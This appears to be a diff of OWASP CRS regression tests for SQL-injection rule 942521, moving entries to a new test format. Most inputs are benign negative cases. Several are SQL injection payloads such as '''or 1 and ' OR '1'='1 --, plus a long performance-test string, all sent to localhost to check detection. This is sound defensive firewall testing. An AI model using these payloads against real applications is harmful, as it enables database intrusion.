no_log_contains: id "942521" - - test_title: 942521-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=mother%20or%20daughter" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_id: 8 desc: "Negative test: 'oreo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='oreo" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='oreo" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_id: 9 desc: "Negative test: 'fork" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='fork" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='fork" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_id: 10 desc: "Negative test: 'for" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='%20for" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='%20for" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_id: 11 desc: "Negative test: ''or" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=''or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=''or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_id: 12 desc: "Negative test: 'books' or 'applles'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=''or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=''or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_id: 13 desc: "Negative test: bob's presentation's 'or'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=''or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=''or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_id: 14 desc: "Bypass with '''or 1" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='''or%201" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='''or%201" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_id: 15 desc: "False-negative: Not detected with escapes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%5C'lol'%20or%20'1" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%5C'lol'%20or%20'1" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_id: 16 desc: "Negative test: Wikipedia article about SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_id: 17 desc: "Performance test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27..